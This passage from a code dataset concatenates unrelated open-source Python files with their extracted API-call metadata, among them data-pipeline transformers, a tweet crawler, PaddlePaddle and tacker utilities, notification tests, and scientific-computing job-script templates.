# -*- coding: utf-8 -*- import os,sys from PyQt4 import QtGui,QtCore dataRoot = os.path.abspath(os.path.join(os.path.dirname(__file__),os.pardir,os.pardir,'histdata')) sys.path.append(dataRoot) import dataCenter as dataCenter from data.mongodb.DataSourceMongodb import Mongodb import datetime as dt def getSymbols(): #mid 1)从excel赋值粘贴获得如下数据 codesStr = """ XAGUSD """ #mid 2)将字符串使用split()分割为list,默认会去除\n和所有空格。 #codeList = ['000021.SZ','000022.SZ'] codeList = [code.split('.')[0] for code in codesStr.split()] return codeList def subMain(): DC = dataCenter.dataCenter() remoteDataSourceType = 'mt5' localStorageType = 'mongodb' periodType = 'D' timeStart = dt.datetime(2000,10,20) timeEnd = dt.datetime.now() # 1)get codes form eastmoney codeList = getSymbols() # 2)download history data dataDict = DC.downloadHistData(providerType=remoteDataSourceType,storageType=localStorageType,periodType=periodType, codeList=codeList,timeFrom = timeStart,timeTo = timeEnd) if __name__ == '__main__': #app = QtGui.QApplication(sys.argv) #mid----------------------------------------------------------------------------------------------------------------------------- subMain() #mid----------------------------------------------------------------------------------------------------------------------------- #sys.exit(app.exec_())
[((6, 0, 6, 25), 'sys.path.append', 'sys.path.append', ({(6, 16, 6, 24): 'dataRoot'}, {}), '(dataRoot)', False, 'import os, sys\n'), ((20, 9, 20, 32), 'dataCenter.dataCenter', 'dataCenter.dataCenter', ({}, {}), '()', True, 'import dataCenter as dataCenter\n'), ((25, 16, 25, 39), 'datetime.datetime', 'dt.datetime', ({(25, 28, 25, 32): '2000', (25, 33, 25, 35): '10', (25, 36, 25, 38): '20'}, {}), '(2000, 10, 20)', True, 'import datetime as dt\n'), ((26, 14, 26, 31), 'datetime.datetime.now', 'dt.datetime.now', ({}, {}), '()', True, 'import datetime as dt\n'), ((5, 40, 5, 65), 'os.path.dirname', 'os.path.dirname', ({(5, 56, 5, 64): '__file__'}, {}), '(__file__)', False, 'import os, sys\n')]
ermshaua/daproli
daproli/transformer.py
c1f7aeec431d9c60ae06eeac23455c1a03bc82cf
from joblib import Parallel, delayed from tqdm import tqdm from .processing import map, filter, split, expand, combine, join from .manipulation import windowed, flatten class BaseTransformer: ''' The BaseTransformer defines a generic data transformation pattern that can be implemented with a number of data processing concepts. ''' def transform(self, data, *args, **kwargs): raise NotImplementedError() class Mapper(BaseTransformer): def __init__(self, func, ret_type=None, expand_args=True, n_jobs=1, verbose=0, **kwargs): ''' dp.Mapper is the respective transformer for dp.map. Parameters ----------- :param func: the mapping function :param ret_type: if provided the used return type, otherwise ret_type(data) :param expand_args: true if args should be expanded, false otherwise :param n_jobs: amount of used threads/processes :param verbose: verbosity level for tqdm / joblib :param kwargs: additional arguments for joblib.Parallel, e.g. backend='loky' ''' self.func = func self.ret_type = ret_type self.expand_args = expand_args self.n_jobs = n_jobs self.verbose = verbose self.kwargs = kwargs def transform(self, data, *args, **kwargs): return map(self.func, data, self.ret_type, expand_args=self.expand_args, n_jobs=self.n_jobs, verbose=self.verbose, **self.kwargs) class Filter(BaseTransformer): def __init__(self, pred, ret_type=None, expand_args=True, n_jobs=1, verbose=0, **kwargs): ''' dp.Filter is the respective transformer for dp.filter. Parameters ----------- :param pred: the filter predicate :param ret_type: if provided the used return type, otherwise ret_type(data) :param expand_args: true if args should be expanded, false otherwise :param n_jobs: amount of used threads/processes :param verbose: verbosity level for tqdm / joblib :param kwargs: additional arguments for joblib.Parallel, e.g. backend='loky' ''' self.pred = pred self.ret_type = ret_type self.expand_args = expand_args self.n_jobs = n_jobs self.verbose = verbose self.kwargs = kwargs def transform(self, data, *args, **kwargs): return filter(self.pred, data, ret_type=self.ret_type, expand_args=self.expand_args, n_jobs=self.n_jobs, verbose=self.verbose, **self.kwargs) class Splitter(BaseTransformer): def __init__(self, func, ret_type=None, return_labels=False, expand_args=True, n_jobs=1, verbose=0, **kwargs): ''' dp.Splitter is the respective transformer for dp.split. Parameters ----------- :param func: the discriminator function :param ret_type: if provided the used return type, otherwise ret_type(data) :param return_labels: true if the associated labels should be returned, false otherwise :param expand_args: true if args should be expanded, false otherwise :param n_jobs: amount of used threads/processes :param verbose: verbosity level for tqdm / joblib :param kwargs: additional arguments for joblib.Parallel, e.g. backend='loky' ''' self.func = func self.ret_type = ret_type self.return_labels = return_labels self.expand_args = expand_args self.n_jobs = n_jobs self.verbose = verbose self.kwargs = kwargs def transform(self, data, *args, **kwargs): return split(self.func, data, ret_type=self.ret_type, return_labels=self.return_labels, expand_args=self.expand_args, n_jobs=self.n_jobs, verbose=self.verbose, **self.kwargs) class Expander(BaseTransformer): def __init__(self, func, ret_type=None, expand_args=True, n_jobs=1, verbose=0, **kwargs): ''' dp.Expander is the respective transformer for dp.expand. Parameters ----------- :param func: the expansion function :param ret_type: if provided the used return type, otherwise ret_type(data) :param expand_args: true if args should be expanded, false otherwise :param n_jobs: amount of used threads/processes :param verbose: verbosity level for tqdm / joblib :param kwargs: additional arguments for joblib.Parallel, e.g. backend='loky' ''' self.func = func self.ret_type = ret_type self.expand_args = expand_args self.n_jobs = n_jobs self.verbose = verbose self.kwargs = kwargs def transform(self, data, *args, **kwargs): return expand(self.func, data, ret_type=self.ret_type, expand_args=self.expand_args, n_jons=self.n_jobs, verbose=self.verbose, **self.kwargs) class Combiner(BaseTransformer): def __init__(self, func, expand_args=True, n_jobs=1, verbose=0, **kwargs): ''' dp.Combiner is the respective transformer for dp.combine. Parameters ----------- :param func: the combination function :param expand_args: true if args should be expanded, false otherwise :param n_jobs: amount of used threads/processes :param verbose: verbosity level for tqdm / joblib :param kwargs: additional arguments for joblib.Parallel, e.g. backend='loky' ''' self.func = func self.expand_args = expand_args self.n_jobs = n_jobs self.verbose = verbose self.kwargs = kwargs def transform(self, data, *args, **kwargs): return combine(self.func, *data, expand_args=self.expand_args, n_jobs=self.n_jobs, verbose=self.verbose, **self.kwargs) class Joiner(BaseTransformer): def __init__(self, func, expand_args=True, n_jobs=1, verbose=0, **kwargs): ''' dp.Joiner is the respective transformer for dp.join. Parameters ----------- :param func: the join function :param expand_args: true if args should be expanded, false otherwise :param n_jobs: amount of used threads/processes :param verbose: verbosity level for tqdm / joblib :param kwargs: additional arguments for joblib.Parallel, e.g. backend='loky' ''' self.func = func self.expand_args = expand_args self.n_jobs = n_jobs self.verbose = verbose self.kwargs = kwargs def transform(self, data, *args, **kwargs): return join(self.func, *data, expand_args=self.expand_args, n_jobs=self.n_jobs, verbose=self.verbose, **self.kwargs) class Manipulator(BaseTransformer): def __init__(self, func, void=False, *args, **kwargs): ''' dp.Manipulator is a transformer to manipulate the entire collection of data items. Parameters ----------- :param func: the manipulation function :param void: if true the result is not returned :param args: additional args for func :param kwargs: additional kwargs for func ''' self.func = func self.void = void self.args = args self.kwargs = kwargs def transform(self, data, *args, **kwargs): res = self.func(data, *self.args, **self.kwargs) return res if self.void is False else data class Window(BaseTransformer): def __init__(self, size, step=1, ret_type=None): ''' dp.Window is the respective transformer for dp.windowed. Parameters ----------- :param data: an iterable collection of data :param size: the window size :param step: the window step :param ret_type: if provided the used return type, otherwise ret_type(data) ''' self.size = size self.step = step self.ret_type = ret_type def transform(self, data, *args, **kwargs): return windowed(data, self.size, step=self.step, ret_type=self.ret_type) class Flat(BaseTransformer): def __init__(self, ret_type=None): ''' dp.Flat is the respective transformer for dp.flatten. Parameters ----------- :param ret_type: if provided the used return type, otherwise ret_type(data) ''' self.ret_type = ret_type def transform(self, data, *args, **kwargs): return flatten(data, ret_type=self.ret_type) class Union(BaseTransformer): def __init__(self, *transformers, n_jobs=1, verbose=0, **kwargs): ''' dp.Union is a construct to manipulate mutli-collections of data tiems. Parameters ----------- :param transformers: the transformers for the respective collections of data items :param n_jobs: amount of used threads/processes :param verbose: verbosity level for tqdm / joblib :param kwargs: additional arguments for joblib.Parallel, e.g. backend='loky' ''' self.transformers = transformers self.n_jobs = n_jobs self.verbose = verbose self.kwargs = kwargs def transform(self, data, *args, **kwargs): if self.n_jobs == 1: return [transformer.transform(items, *args, **kwargs) for transformer, items in tqdm(zip(self.transformers, data), disable=self.verbose < 1)] return Parallel(n_jobs=self.n_jobs, verbose=self.verbose, **self.kwargs)(delayed(transformer.transform) (items, *args, **kwargs) for transformer, items in zip(self.transformers, data)) class Pipeline(BaseTransformer): def __init__(self, *transformers, verbose=0): ''' dp.Pipeline is a construct to pipe a collection of transformers. Parameters ----------- :param transformers: the transformer sequence to apply :param verbose: verbosity level for tqdm ''' self.transformers = list(transformers) self.verbose = verbose def transform(self, data, *args, **kwargs): res = data for transformer in tqdm(self.transformers, disable=self.verbose < 1): res = transformer.transform(res, *args, **kwargs) return res
[((279, 27, 279, 76), 'tqdm.tqdm', 'tqdm', (), '', False, 'from tqdm import tqdm\n'), ((258, 15, 258, 80), 'joblib.Parallel', 'Parallel', (), '', False, 'from joblib import Parallel, delayed\n'), ((258, 81, 258, 111), 'joblib.delayed', 'delayed', ({(258, 89, 258, 110): 'transformer.transform'}, {}), '(transformer.transform)', False, 'from joblib import Parallel, delayed\n')]
LorranSutter/URI-Online-Judge
Ad-Hoc/2454.py
aef885b9a7caa83484cf172e29eea8ec92fc3627
P, R = input().split() if P == '0': print('C') elif R == '0': print('B') else: print('A')
[]
brunotoshio/castella
main.py
ad418bd1beb4953687a4ad7be586b12631c25992
import pymongo import yaml import sched import time import json from castella import TweetCrawler class Castella(object): def __init__(self): # Get connection parameters with open("settings.yml", "r") as stream: try: settings = yaml.safe_load(stream)["settings"] # Database self.server_url = settings["output"]["database"]["url"] self.server_port = settings["output"]["database"]["port"] self.database_name = settings["output"]["database"]["database"] self.collection_name = settings["output"]["database"]["collection"] # Search self.query = settings["search"]["query"] self.search_params = settings["search"]["params"] # Schedule self.interval_type = settings["interval"]["each"] self.interval_amount = settings["interval"]["amount"] self.total_executions = 0 except yaml.YAMLError as exc: print("ERROR: No settings.yml found or it could not be read") def execute_search(self): # Mongo connection client = pymongo.MongoClient(self.server_url, self.server_port) db = client[self.database_name] self.tweets = db[self.collection_name] self._create_scheduled_executions() def _save_tweet(self, tweet): print("Saving: ", tweet._json["id_str"]) try: bson = tweet._json bson["query_str"] = self.query self.tweets.insert_one(bson) except: print("Error occurred when trying to save") def _search(self): # Continue from last id try: self.tweets.create_index([("id", pymongo.DESCENDING)]) last_tweet = self.tweets.find({}).sort([("id", pymongo.DESCENDING)]).next() except StopIteration: last_tweet = None # Searching tc = TweetCrawler() params = dict(result_type="recent", include_entities=True, count=100) if isinstance(self.search_params, dict): params.update(self.search_params) if last_tweet is not None: print("============================================================") print("Resuming from tweet id:", last_tweet['id_str']) print("============================================================") params["since_id"] = last_tweet.get("id_str") tc.search(self.query, self._save_tweet, params) self.total_executions += 1 print("============================================================") print("Finished for today...") print(self.total_executions, "out of", self.interval_amount, "scheduled executions") print("============================================================") if self.total_executions < self.interval_amount: print("Keep this process running until the execution of the last scheduled iteration, or stop this process to cancel further executions.") print("============================================================") # Preparing functions for scheduler def _days(self): return time.time() / (60 * 60 * 24) def _weeks(self): return time.time() / (60 * 60 * 24 * 7) # Scheduling events def _create_scheduled_executions(self): if self.interval_type == "day": handler = self._days else: handler = self._weeks scheduler = sched.scheduler(handler, time.sleep) for i in range(self.interval_amount): scheduler.enter(i, 1, self._search) scheduler.run() if __name__ == "__main__": searcher = Castella() searcher.execute_search()
[((35, 17, 35, 71), 'pymongo.MongoClient', 'pymongo.MongoClient', ({(35, 37, 35, 52): 'self.server_url', (35, 54, 35, 70): 'self.server_port'}, {}), '(self.server_url, self.server_port)', False, 'import pymongo\n'), ((59, 13, 59, 27), 'castella.TweetCrawler', 'TweetCrawler', ({}, {}), '()', False, 'from castella import TweetCrawler\n'), ((95, 20, 95, 56), 'sched.scheduler', 'sched.scheduler', ({(95, 36, 95, 43): 'handler', (95, 45, 95, 55): 'time.sleep'}, {}), '(handler, time.sleep)', False, 'import sched\n'), ((83, 15, 83, 26), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((87, 15, 87, 26), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((14, 27, 14, 49), 'yaml.safe_load', 'yaml.safe_load', ({(14, 42, 14, 48): 'stream'}, {}), '(stream)', False, 'import yaml\n')]
monroid/openvino
ngraph/test/frontend/paddlepaddle/test_models/gen_scripts/generate_slice.py
8272b3857ef5be0aaa8abbf7bd0d5d5615dc40b6
# # slice paddle model generator # import numpy as np from save_model import saveModel import paddle as pdpd import sys data_type = 'float32' def slice(name : str, x, axes : list, start : list, end : list): pdpd.enable_static() with pdpd.static.program_guard(pdpd.static.Program(), pdpd.static.Program()): node_x = pdpd.static.data(name='x', shape=x.shape, dtype = data_type) out = pdpd.fluid.layers.slice(node_x, axes = axes, starts = start, ends = end) cpu = pdpd.static.cpu_places(1) exe = pdpd.static.Executor(cpu[0]) # startup program will call initializer to initialize the parameters. exe.run(pdpd.static.default_startup_program()) outs = exe.run( feed={'x': x}, fetch_list=[out]) saveModel(name, exe, feedkeys=['x'], fetchlist=[out], inputs=[x], outputs=[outs[0]], target_dir=sys.argv[1]) return outs[0] def main(): x = np.linspace(1, 60, num = 60, dtype=np.int32).reshape(4, 3, 5).astype(data_type) slice("slice", x, axes=[1, 2], start=(0, 1), end=(-1, 3)) x = np.linspace(1, 60, num = 60, dtype=np.int32).reshape(2, 30).astype(data_type) slice("slice_1d", x, axes=[0], start=[0], end=[1]) if __name__ == "__main__": main()
[((12, 4, 12, 24), 'paddle.enable_static', 'pdpd.enable_static', ({}, {}), '()', True, 'import paddle as pdpd\n'), ((15, 17, 15, 77), 'paddle.static.data', 'pdpd.static.data', (), '', True, 'import paddle as pdpd\n'), ((16, 14, 16, 86), 'paddle.fluid.layers.slice', 'pdpd.fluid.layers.slice', (), '', True, 'import paddle as pdpd\n'), ((18, 14, 18, 39), 'paddle.static.cpu_places', 'pdpd.static.cpu_places', ({(18, 37, 18, 38): '1'}, {}), '(1)', True, 'import paddle as pdpd\n'), ((19, 14, 19, 42), 'paddle.static.Executor', 'pdpd.static.Executor', ({(19, 35, 19, 41): 'cpu[0]'}, {}), '(cpu[0])', True, 'import paddle as pdpd\n'), ((27, 8, 27, 116), 'save_model.saveModel', 'saveModel', (), '', False, 'from save_model import saveModel\n'), ((14, 35, 14, 56), 'paddle.static.Program', 'pdpd.static.Program', ({}, {}), '()', True, 'import paddle as pdpd\n'), ((14, 58, 14, 79), 'paddle.static.Program', 'pdpd.static.Program', ({}, {}), '()', True, 'import paddle as pdpd\n'), ((21, 16, 21, 53), 'paddle.static.default_startup_program', 'pdpd.static.default_startup_program', ({}, {}), '()', True, 'import paddle as pdpd\n'), ((32, 8, 32, 52), 'numpy.linspace', 'np.linspace', (), '', True, 'import numpy as np\n'), ((35, 8, 35, 52), 'numpy.linspace', 'np.linspace', (), '', True, 'import numpy as np\n')]
h1r0mu/tacker
tacker/sol_refactored/common/vnf_instance_utils.py
8c69dda51fcfe215c4878a86b82018d2b96e5561
# Copyright (C) 2021 Nippon Telegraph and Telephone Corporation # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from oslo_log import log as logging from tacker.sol_refactored.common import exceptions as sol_ex from tacker.sol_refactored import objects LOG = logging.getLogger(__name__) # not used at the moment def get_inst(context, inst_id): inst = objects.VnfInstanceV2.get_by_id(context, inst_id) if inst is None: raise sol_ex.VnfInstanceNotFound(inst_id=inst_id) return inst def get_inst_all(context): return objects.VnfInstanceV2.get_all(context) def inst_href(inst_id, endpoint): return "{}/v2/vnflcm/vnf_instances/{}".format(endpoint, inst_id) def make_inst_links(inst, endpoint): links = objects.VnfInstanceV2_Links() self_href = inst_href(inst.id, endpoint) links.self = objects.Link(href=self_href) if inst.instantiationState == 'NOT_INSTANTIATED': links.instantiate = objects.Link(href=self_href + "/instantiate") else: # 'INSTANTIATED' links.terminate = objects.Link(href=self_href + "/terminate") # TODO(oda-g): add when the operation supported # links.scale = objects.Link(href = self_href + "/scale") # etc. return links # see IETF RFC 7396 def json_merge_patch(target, patch): if isinstance(patch, dict): if not isinstance(target, dict): target = {} for key, value in patch.items(): if value is None: if key in target: del target[key] else: target[key] = json_merge_patch(target.get(key), value) return target else: return patch def select_vim_info(vim_connection_info): # NOTE: It is assumed that vimConnectionInfo has only one item # at the moment. If there are multiple items, it is uncertain # which item is selected. for vim_info in vim_connection_info.values(): return vim_info
[((23, 6, 23, 33), 'oslo_log.log.getLogger', 'logging.getLogger', ({(23, 24, 23, 32): '__name__'}, {}), '(__name__)', True, 'from oslo_log import log as logging\n'), ((27, 11, 27, 60), 'tacker.sol_refactored.objects.VnfInstanceV2.get_by_id', 'objects.VnfInstanceV2.get_by_id', ({(27, 43, 27, 50): 'context', (27, 52, 27, 59): 'inst_id'}, {}), '(context, inst_id)', False, 'from tacker.sol_refactored import objects\n'), ((34, 11, 34, 49), 'tacker.sol_refactored.objects.VnfInstanceV2.get_all', 'objects.VnfInstanceV2.get_all', ({(34, 41, 34, 48): 'context'}, {}), '(context)', False, 'from tacker.sol_refactored import objects\n'), ((42, 12, 42, 41), 'tacker.sol_refactored.objects.VnfInstanceV2_Links', 'objects.VnfInstanceV2_Links', ({}, {}), '()', False, 'from tacker.sol_refactored import objects\n'), ((44, 17, 44, 45), 'tacker.sol_refactored.objects.Link', 'objects.Link', (), '', False, 'from tacker.sol_refactored import objects\n'), ((29, 14, 29, 57), 'tacker.sol_refactored.common.exceptions.VnfInstanceNotFound', 'sol_ex.VnfInstanceNotFound', (), '', True, 'from tacker.sol_refactored.common import exceptions as sol_ex\n'), ((46, 28, 46, 73), 'tacker.sol_refactored.objects.Link', 'objects.Link', (), '', False, 'from tacker.sol_refactored import objects\n'), ((48, 26, 48, 69), 'tacker.sol_refactored.objects.Link', 'objects.Link', (), '', False, 'from tacker.sol_refactored import objects\n')]
cjw296/testfixtures
testfixtures/compat.py
1bf1e6fe1e111210d6d7fbcd00feb564095ffd02
# compatibility module for different python versions import sys if sys.version_info[:2] > (3, 0): PY2 = False PY3 = True Bytes = bytes Unicode = str basestring = str class_type_name = 'class' ClassType = type exception_module = 'builtins' new_class = type self_name = '__self__' from io import StringIO xrange = range else: PY2 = True PY3 = False Bytes = str Unicode = unicode basestring = basestring class_type_name = 'type' from types import ClassType exception_module = 'exceptions' from new import classobj as new_class self_name = 'im_self' from cStringIO import StringIO xrange = xrange
[]
ofekashery/the-blue-alliance
old_py2/tests/models_tests/notifications/test_match_score.py
df0e47d054161fe742ac6198a6684247d0713279
import re import unittest2 from google.appengine.ext import ndb from google.appengine.ext import testbed from consts.notification_type import NotificationType from helpers.event.event_test_creator import EventTestCreator from models.team import Team from models.notifications.match_score import MatchScoreNotification class TestMatchScoreNotification(unittest2.TestCase): def setUp(self): self.testbed = testbed.Testbed() self.testbed.activate() self.testbed.init_datastore_v3_stub() self.testbed.init_memcache_stub() ndb.get_context().clear_cache() # Prevent data from leaking between tests self.testbed.init_taskqueue_stub(root_path=".") for team_number in range(6): Team(id="frc%s" % team_number, team_number=team_number).put() self.event = EventTestCreator.createPresentEvent() self.match = self.event.matches[0] self.notification = MatchScoreNotification(self.match) def tearDown(self): self.testbed.deactivate() def test_type(self): self.assertEqual(MatchScoreNotification._type(), NotificationType.MATCH_SCORE) def test_fcm_notification(self): self.assertIsNotNone(self.notification.fcm_notification) self.assertEqual(self.notification.fcm_notification.title, 'TESTPRESENT Q1 Results') match_regex = re.compile(r'^\d+, \d+, \d+ beat \d+, \d+, \d+ scoring \d+-\d+.$') match = re.match(match_regex, self.notification.fcm_notification.body) self.assertIsNotNone(match) def test_fcm_notification_tied(self): score = self.notification.match.alliances['red']['score'] self.notification.match.alliances['blue']['score'] = score self.assertIsNotNone(self.notification.fcm_notification) self.assertEqual(self.notification.fcm_notification.title, 'TESTPRESENT Q1 Results') match_regex = re.compile(r'^\d+, \d+, \d+ tied with \d+, \d+, \d+ scoring \d+-\d+.$') match = re.match(match_regex, self.notification.fcm_notification.body) self.assertIsNotNone(match) def test_fcm_notification_team(self): team = Team.get_by_id('frc1') notification = MatchScoreNotification(self.match, team) self.assertEqual(notification.fcm_notification.title, 'Team 1 TESTPRESENT Q1 Results') def test_data_payload(self): payload = self.notification.data_payload self.assertEqual(len(payload), 2) self.assertEqual(payload['event_key'], self.event.key_name) self.assertEqual(payload['match_key'], '{}_qm1'.format(self.event.key_name)) def test_data_payload_team(self): team = Team.get_by_id('frc1') notification = MatchScoreNotification(self.match, team) payload = notification.data_payload self.assertEqual(len(payload), 3) self.assertEqual(payload['event_key'], self.event.key_name) self.assertEqual(payload['match_key'], '{}_qm1'.format(self.event.key_name)) self.assertEqual(payload['team_key'], 'frc1') def test_webhook_message_data(self): # Has `event_name` payload = self.notification.webhook_message_data self.assertEqual(len(payload), 3) self.assertEqual(payload['event_key'], self.event.key_name) self.assertEqual(payload['event_name'], 'Present Test Event') self.assertIsNotNone(payload['match']) def test_webhook_message_data_team(self): team = Team.get_by_id('frc1') notification = MatchScoreNotification(self.match, team) payload = notification.webhook_message_data self.assertEqual(len(payload), 4) self.assertEqual(payload['event_key'], self.event.key_name) self.assertEqual(payload['event_name'], 'Present Test Event') self.assertEqual(payload['team_key'], 'frc1') self.assertIsNotNone(payload['match'])
[((17, 23, 17, 40), 'google.appengine.ext.testbed.Testbed', 'testbed.Testbed', ({}, {}), '()', False, 'from google.appengine.ext import testbed\n'), ((29, 21, 29, 58), 'helpers.event.event_test_creator.EventTestCreator.createPresentEvent', 'EventTestCreator.createPresentEvent', ({}, {}), '()', False, 'from helpers.event.event_test_creator import EventTestCreator\n'), ((32, 28, 32, 62), 'models.notifications.match_score.MatchScoreNotification', 'MatchScoreNotification', ({(32, 51, 32, 61): 'self.match'}, {}), '(self.match)', False, 'from models.notifications.match_score import MatchScoreNotification\n'), ((43, 22, 43, 88), 're.compile', 're.compile', ({(43, 33, 43, 87): '"""^\\\\d+, \\\\d+, \\\\d+ beat \\\\d+, \\\\d+, \\\\d+ scoring \\\\d+-\\\\d+.$"""'}, {}), "('^\\\\d+, \\\\d+, \\\\d+ beat \\\\d+, \\\\d+, \\\\d+ scoring \\\\d+-\\\\d+.$')", False, 'import re\n'), ((44, 16, 44, 78), 're.match', 're.match', ({(44, 25, 44, 36): 'match_regex', (44, 38, 44, 77): 'self.notification.fcm_notification.body'}, {}), '(match_regex, self.notification.fcm_notification.body)', False, 'import re\n'), ((52, 22, 52, 93), 're.compile', 're.compile', ({(52, 33, 52, 92): '"""^\\\\d+, \\\\d+, \\\\d+ tied with \\\\d+, \\\\d+, \\\\d+ scoring \\\\d+-\\\\d+.$"""'}, {}), "('^\\\\d+, \\\\d+, \\\\d+ tied with \\\\d+, \\\\d+, \\\\d+ scoring \\\\d+-\\\\d+.$')", False, 'import re\n'), ((53, 16, 53, 78), 're.match', 're.match', ({(53, 25, 53, 36): 'match_regex', (53, 38, 53, 77): 'self.notification.fcm_notification.body'}, {}), '(match_regex, self.notification.fcm_notification.body)', False, 'import re\n'), ((57, 15, 57, 37), 'models.team.Team.get_by_id', 'Team.get_by_id', ({(57, 30, 57, 36): '"""frc1"""'}, {}), "('frc1')", False, 'from models.team import Team\n'), ((58, 23, 58, 63), 'models.notifications.match_score.MatchScoreNotification', 'MatchScoreNotification', ({(58, 46, 58, 56): 'self.match', (58, 58, 58, 62): 'team'}, {}), '(self.match, team)', False, 'from models.notifications.match_score import MatchScoreNotification\n'), ((68, 15, 68, 37), 'models.team.Team.get_by_id', 'Team.get_by_id', ({(68, 30, 68, 36): '"""frc1"""'}, {}), "('frc1')", False, 'from models.team import Team\n'), ((69, 23, 69, 63), 'models.notifications.match_score.MatchScoreNotification', 'MatchScoreNotification', ({(69, 46, 69, 56): 'self.match', (69, 58, 69, 62): 'team'}, {}), '(self.match, team)', False, 'from models.notifications.match_score import MatchScoreNotification\n'), ((85, 15, 85, 37), 'models.team.Team.get_by_id', 'Team.get_by_id', ({(85, 30, 85, 36): '"""frc1"""'}, {}), "('frc1')", False, 'from models.team import Team\n'), ((86, 23, 86, 63), 'models.notifications.match_score.MatchScoreNotification', 'MatchScoreNotification', ({(86, 46, 86, 56): 'self.match', (86, 58, 86, 62): 'team'}, {}), '(self.match, team)', False, 'from models.notifications.match_score import MatchScoreNotification\n'), ((38, 25, 38, 55), 'models.notifications.match_score.MatchScoreNotification._type', 'MatchScoreNotification._type', ({}, {}), '()', False, 'from models.notifications.match_score import MatchScoreNotification\n'), ((21, 8, 21, 25), 'google.appengine.ext.ndb.get_context', 'ndb.get_context', ({}, {}), '()', False, 'from google.appengine.ext import ndb\n'), ((26, 12, 27, 41), 'models.team.Team', 'Team', (), '', False, 'from models.team import Team\n')]
jeanlucf22/mgmol
util/submission/templates.py
4e79bc32c14c8a47ae18ad0659ea740719c8b77f
md_template_d144 = """verbosity=0 xcFunctional=PBE FDtype=4th [Mesh] nx=160 ny=80 nz=80 [Domain] ox=0. oy=0. oz=0. lx=42.4813 ly=21.2406 lz=21.2406 [Potentials] pseudopotential=pseudo.D_tm_pbe [Poisson] solver=@ max_steps_initial=@50 max_steps=@50 reset=@ bcx=periodic bcy=periodic bcz=periodic [Run] type=MD [MD] type=@ num_steps=@ dt=@15. [XLBOMD] dissipation=@5 align=@ [Quench] max_steps=@5 max_steps_tight=@ atol=1.e-@10 num_lin_iterations=3 ortho_freq=100 [SpreadPenalty] type=@energy damping=@ [email protected] [email protected] [Orbitals] initial_type=Gaussian initial_width=1.5 overallocate_factor=@2. [ProjectedMatrices] solver=@short_sighted [LocalizationRegions] radius=@8. auxiliary_radius=@ [email protected] [Restart] input_filename=wave.out input_level=3 interval=@ """ md_template_H2O_64 = """verbosity=1 xcFunctional=PBE FDtype=4th [Mesh] nx=128 ny=128 nz=128 [Domain] ox=0. oy=0. oz=0. lx=23.4884 ly=23.4884 lz=23.4884 [Potentials] pseudopotential=pseudo.O_ONCV_PBE_SG15 pseudopotential=pseudo.D_ONCV_PBE_SG15 [Poisson] solver=@ max_steps=@ [Run] type=MD [Quench] max_steps=1000 atol=1.e-@ [MD] type=@ num_steps=@ dt=10. print_interval=5 [XLBOMD] dissipation=@ align=@ [Restart] input_filename=wave.out input_level=4 output_level=4 interval=@ """ quench_template_H2O_64 = """verbosity=1 xcFunctional=PBE FDtype=4th [Mesh] nx=128 ny=128 nz=128 [Domain] ox=0. oy=0. oz=0. lx=23.4884 ly=23.4884 lz=23.4884 [Potentials] pseudopotential=pseudo.O_ONCV_PBE_SG15 pseudopotential=pseudo.D_ONCV_PBE_SG15 [Run] type=QUENCH [Quench] max_steps=1000 atol=1.e-8 [Orbitals] initial_type=Fourier [Restart] output_level=4 """ quench_template_d144 = """verbosity=1 xcFunctional=PBE FDtype=4th [Mesh] nx=160 ny=80 nz=80 [Domain] ox=0. oy=0. oz=0. lx=42.4813 ly=21.2406 lz=21.2406 [Potentials] pseudopotential=pseudo.D_tm_pbe [Poisson] solver=@ max_steps_initial=@50 max_steps=@50 bcx=periodic bcy=periodic bcz=periodic [Run] type=QUENCH [Quench] max_steps=200 atol=1.e-7 num_lin_iterations=3 ortho_freq=100 [SpreadPenalty] type=@energy damping=@ [email protected] [email protected] [Orbitals] initial_type=Gaussian initial_width=1.5 [ProjectedMatrices] solver=@short_sighted [LocalizationRegions] radius=@8. [Restart] output_type=distributed """ H2O_64_params={ 'nodes': '32', 'ntasks': '256', 'omp_num_threads': 8 if omp_num_threads == 4 else omp_num_threads, 'cores_per_task': '2', 'potentials': 'ln -s $maindir/potentials/pseudo.O_ONCV_PBE_SG15\nln -s $maindir/potentials/pseudo.D_ONCV_PBE_SG15', 'lrs': '', 'jobname': 'H2O_64', } d144_params={ 'nodes': '8', 'walltime': '01:30:00', 'ntasks': '125', 'omp_num_threads': omp_num_threads, 'cores_per_task': '1', 'potentials': 'ln -s $maindir/potentials/pseudo.D_tm_pbe', 'lrs': '-l lrs.in', 'jobname': 'd144', } vulcan_params={ 'queue': 'psmall', 'scratch_path': '/p/lscratchv/mgmolu/dunn27/mgmol/', 'gres': 'lscratchv', 'exe': 'mgmol-bgq', } cab_params={ 'queue': 'pbatch', 'scratch_path': '/p/lscratchd/dunn27/mgmol/', 'gres': 'lscratchd', 'omp_num_threads': '1', 'exe': 'mgmol-pel', 'walltime': '01:30:00', } runfile_quench_template="""#!/bin/tcsh #MSUB -l nodes={nodes},walltime={walltime} #MSUB -o mgmol.out #MSUB -q {queue} #MSUB -A comp #MSUB -l gres={gres} #MSUB -N {jobname} rm -f queued echo ' ' > running use boost-nompi-1.55.0 export BOOST_ROOT=/usr/local/tools/boost-nompi-1.55.0 export Boost_NO_SYSTEM_PATHS=ON setenv OMP_NUM_THREADS {omp_num_threads} set ntasks = {ntasks} set maindir = $home/mgmol set exe = $maindir/bin/{exe} set datadir = `pwd` set scratchdir = {scratch_path}`basename $datadir` mkdir $scratchdir cd $scratchdir echo ' ' > running set cfg_quench = mgmol_quench.cfg cp $datadir/$cfg_quench . cp $datadir/coords.in . cp $datadir/lrs.in . {potentials} #1st run srun -n $ntasks -c {cores_per_task} $exe -c $cfg_quench -i coords.in {lrs} #restart rm -f wave.out set restart_file=`ls -ld * | awk '/snapshot0/ {{ print $9 }}' | tail -n1` ln -s -f $restart_file wave.out rm -f running echo ' ' > queued """ runfile_md_template="""#!/bin/tcsh #MSUB -l nodes={nodes},walltime={walltime} #MSUB -o mgmol.out #MSUB -q {queue} #MSUB -A comp #MSUB -l gres={gres} #MSUB -N {jobname} rm -f queued echo ' ' > running 